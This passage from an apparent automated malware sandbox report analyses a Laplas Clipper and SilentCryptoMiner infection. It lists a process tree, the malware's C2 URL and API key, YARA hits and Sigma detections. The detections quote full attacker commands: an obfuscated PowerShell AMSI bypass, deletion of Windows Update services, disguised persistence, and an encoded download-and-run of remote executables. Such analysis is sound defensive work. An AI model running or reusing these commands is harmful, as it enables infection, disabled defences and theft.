$_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.d'+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+'n'+'3'+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'emr'+[Char](115)+''+[Char](78)+''+[Char](90)+''+'v'+''+[Char](85)+'s'+[Char](87)+''+[Char](74)+'B'+[Char](110)+''+[Char](77)+'');$xKuInBktgkPNhs=$mrsNZvUsWJBnM.GetMethod(''+'x'+'Ku'+[Char](73)+''+'n'+''+[Char](66)+''+[Char](107)+''+[Char](116)+''+'g'+'k'+[Char](80)+''+'N'+'h'+'s'+'',[Reflection.BindingFlags]'Pub'+'l'+''+'i'+''+'c'+''+','+''+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hpDOMeMRBRCuAUuldah=QgCYtqphZUyk @([String])([IntPtr]);$lBJaJRBvBxDAIBOClAwhdJ=QgCYtqphZUyk @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zPFNVuWfmpd=$mrsNZvUsWJBnM.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+'l')));$TxJrEjJObcCpmZ=$xKuInBktgkPNhs.Invoke($Null,@([Object]$zPFNVuWfmpd,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+'L'+[Char](105)+''+'b'+''+'r'+''+[Char](97)+''+[Char](114)+''+'y'+'A')));$bZvPuqWGWAxchxpvH=$xKuInBktgkPNhs.Invoke($Null,@([Object]$zPFNVuWfmpd,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+'o'+[Char](116)+'e'+[Char](99)+'t')));$jweDifO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TxJrEjJObcCpmZ,$hpDOMeMRBRCuAUuldah).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+[Char](46)+'d'+'l'+''+[Char](108)+'');$fOCXrgjBAURvBdTAm=$xKuInBktgkPNhs.Invoke($Null,@([Object]$jweDifO,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+'uf'+[Char](102)+'e'+'r'+'')));$tTEVvGnGYm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bZvPuqWGWAxchxpvH,$lBJaJRBvBxDAIBOClAwhdJ).Invoke($fOCXrgjBAURvBdTAm,[uint32]8,4,[ref]$tTEVvGnGYm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fOCXrgjBAURvBdTAm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bZvPuqWGWAxchxpvH,$lBJaJRBvBxDAIBOClAwhdJ).Invoke($fOCXrgjBAURvBdTAm,[uint32]8,0x20,[ref]$tTEVvGnGYm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'TW'+[Char](65)+'R'+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+'a'+[Char](108)+''+'e'+''+'r'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null) MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 8168 cmdline: C:\Windows\System32\dllhost.exe /Processid:{096b6fe7-1e57-4538-901c-c68ea60d3345} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

Threatname: Laplas Clipper

{"C2 url": "http://45.159.189.105/bot/", "API key": "5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000028.00000002.2555004791.000001C52EB9A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SilentCryptoMinerYara detected SilentCrypto MinerJoe Security
    00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SilentCryptoMinerYara detected SilentCrypto MinerJoe Security
      00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmpJoeSecurity_SilentCryptoMinerYara detected SilentCrypto MinerJoe Security
        00000023.00000002.2992259011.0000000000B4A000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_LaplasClipperYara detected Laplas ClipperJoe Security
          00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpJoeSecurity_SilentCryptoMinerYara detected SilentCrypto MinerJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            37.2.dialer.exe.7ff790dc0000.0.unpackJoeSecurity_SilentCryptoMinerYara detected SilentCrypto MinerJoe Security
              40.2.powershell.exe.1c51e800000.0.unpackJoeSecurity_SilentCryptoMinerYara detected SilentCrypto MinerJoe Security
                7.2.LicSend.exe.7ff7d3ba5900.2.unpackJoeSecurity_SilentCryptoMinerYara detected SilentCrypto MinerJoe Security
                  37.2.dialer.exe.7ff790dc60b0.1.unpackJoeSecurity_SilentCryptoMinerYara detected SilentCrypto MinerJoe Security
                    40.2.powershell.exe.1c52eb9aeb0.7.raw.unpackJoeSecurity_SilentCryptoMinerYara detected SilentCrypto MinerJoe Security
                      Click to see the 9 entries

                      Other

                      SourceRuleDescriptionAuthorStrings
                      amsi64_7520.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                        Sigma Signatures

                        Operating System Destruction

                        barindex
                        Sigma detected: Stop multiple services
                        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, ProcessId: 5460, ProcessName: cmd.exe

                        System Summary

                        barindex
                        Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execu
                        Sigma detected: Invoke-Obfuscation VAR+ Launcher
                        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execu
                        Sigma detected: Net WebClient Casing Anomalies
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBz
                        Sigma detected: Potential PowerShell Command Line Obfuscation
                        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NGLbonfBsuNR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtvYIpWnFCFICq,[Parameter(Position=1)][Type]$hhlNOVEDYw)$dpttUeHYiSd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+'at'+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dpttUeHYiSd.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+'ide'+'B'+'y'+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QtvYIpWnFCFICq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$dpttUeHYiSd.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$hhlNOVEDYw,$QtvYIpWnFCFICq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $dpttUeHYiSd.CreateType();}$fxvCjurJEEUcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'f'+'x'+''+[Char](118)+'C'+[Char](106)+''+'u'+''+[Char](114)+''+[Char](74)+''+[Char](69)+''+[Char](
                        Sigma detected: Potential WinAPI Calls Via CommandLine
                        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NGLbonfBsuNR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtvYIpWnFCFICq,[Parameter(Position=1)][Type]$hhlNOVEDYw)$dpttUeHYiSd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+'at'+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dpttUeHYiSd.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+'ide'+'B'+'y'+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QtvYIpWnFCFICq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$dpttUeHYiSd.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+''